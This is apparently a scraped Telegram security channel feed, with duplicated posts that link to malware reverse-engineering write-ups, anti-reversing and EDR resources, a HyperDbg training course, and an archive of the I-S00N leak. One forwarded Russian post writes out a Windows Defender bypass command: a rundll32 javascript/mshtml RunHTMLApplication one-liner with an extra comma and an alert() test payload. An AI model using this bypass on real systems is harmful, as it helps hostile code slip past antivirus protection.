Reverse engineering of Android Phoenix RAT
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
Medium
Reverse engineering of Android/Phoenix
Android/Phoenix is a malicious Remote Access Tool. Its main goal is to extensively spy on the victim’s phone (grab all screenshots, steal…
Forwarded from Proxy Bar
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
*
то есть было и пофиксили:
магия запятой:
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
👍4
👍2
👍2
NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes
Link
#reverse
———
@islemolecule_source
Link
#reverse
———
@islemolecule_source
👍2
Take a look into the depths of
Windows kernels and
reveal more than 60000
undocumented structures
https://www.vergiliusproject.com/kernels
#windows
———
@islemolecule_source
Windows kernels and
reveal more than 60000
undocumented structures
https://www.vergiliusproject.com/kernels
#windows
———
@islemolecule_source
🔥6
🔥1🙏1
Malware research community repo
https://github.com/Malware-Research/Resources
#malware_analysis
____
@islemolecule_source
https://github.com/Malware-Research/Resources
#malware_analysis
____
@islemolecule_source
GitHub
GitHub - Malware-Research/Resources: Collection of resources that are made by the Malware Research community
Collection of resources that are made by the Malware Research community - Malware-Research/Resources
🔥2
Forwarded from Source Byte (Anastasia 🐞)
[ 1 ] From a Windows driver to a fully functionnal driver.
In this blogpost we'll go through the history of EDR's, how they used to work, how they work now and how we can build a fully functionnal one. Last step is a chall, bypass MyDumbEDR.
https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
[ 2 ] internal mecanisms of EDR's :
https://www.youtube.com/watch?v=yacpjV6kWpM&t=387s
[ 3 ] MyDumbEDR ( written in C )
https://github.com/sensepost/mydumbedr
———
@islemolecule_source
In this blogpost we'll go through the history of EDR's, how they used to work, how they work now and how we can build a fully functionnal one. Last step is a chall, bypass MyDumbEDR.
https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
[ 2 ] internal mecanisms of EDR's :
https://www.youtube.com/watch?v=yacpjV6kWpM&t=387s
[ 3 ] MyDumbEDR ( written in C )
https://github.com/sensepost/mydumbedr
———
@islemolecule_source
❤5
The comprehensive HyperDbg training course published on YouTube. It is definitely much better to register on OpenSecurityTrainings website and follow the course there because there are a series of labs and additional instructions on their website:
https://ost2.fyi/Dbg3301
Here is the YouTube playlist link:
https://www.youtube.com/watch?v=RDlp0PCFgxI&list=PLUFkSN0XLZ-kF1f143wlw8ujlH2A45nZY
Slides link:
https://gitlab.com/opensecuritytraining/dbg3301_hyperdbg_slides_and_files
If you have any feedback, I will be happy to share it with you. 🙏
(sina ✍)
https://ost2.fyi/Dbg3301
Here is the YouTube playlist link:
https://www.youtube.com/watch?v=RDlp0PCFgxI&list=PLUFkSN0XLZ-kF1f143wlw8ujlH2A45nZY
Slides link:
https://gitlab.com/opensecuritytraining/dbg3301_hyperdbg_slides_and_files
If you have any feedback, I will be happy to share it with you. 🙏
(sina ✍)
❤5
Forwarded from vx-underground
tl;dr archived stuff, see link below
Earlier today a GitHub noscriptd "I-S00N" leaked supposedly sensitive Chinese government data - specifically related to offensive cyber security.
The initial discovery, and documentation of the documents, derive from AzakaSekai_. We have archived his research and notes on the material.
It should be noted that they *probably have not covered the material in totality and more information can be expected to be released in the following days from either Azaka, or other Cyber Threat Intelligence experts familiar with Chinese state-sponsored activity.
Furthermore, the materials are written in Mandarin. We have made no attempt to translate the material to English and we do not speak Mandarin, hence we cannot provide any opinion or speculation on the material. We will leave that painstaking task to individuals who speak Mandarin, or people who feel like trying to translate the documents accurately.
What an exciting start to the week:)
You can view the archived materials here: https://vx-underground.org/APTs/2024/2024.02.18%20-%20Summary%20of%20I-S00N%20leaks
Earlier today a GitHub noscriptd "I-S00N" leaked supposedly sensitive Chinese government data - specifically related to offensive cyber security.
The initial discovery, and documentation of the documents, derive from AzakaSekai_. We have archived his research and notes on the material.
It should be noted that they *probably have not covered the material in totality and more information can be expected to be released in the following days from either Azaka, or other Cyber Threat Intelligence experts familiar with Chinese state-sponsored activity.
Furthermore, the materials are written in Mandarin. We have made no attempt to translate the material to English and we do not speak Mandarin, hence we cannot provide any opinion or speculation on the material. We will leave that painstaking task to individuals who speak Mandarin, or people who feel like trying to translate the documents accurately.
What an exciting start to the week:)
You can view the archived materials here: https://vx-underground.org/APTs/2024/2024.02.18%20-%20Summary%20of%20I-S00N%20leaks
Vx Underground
The largest collection of malware source code, samples, and papers on the internet.
👍1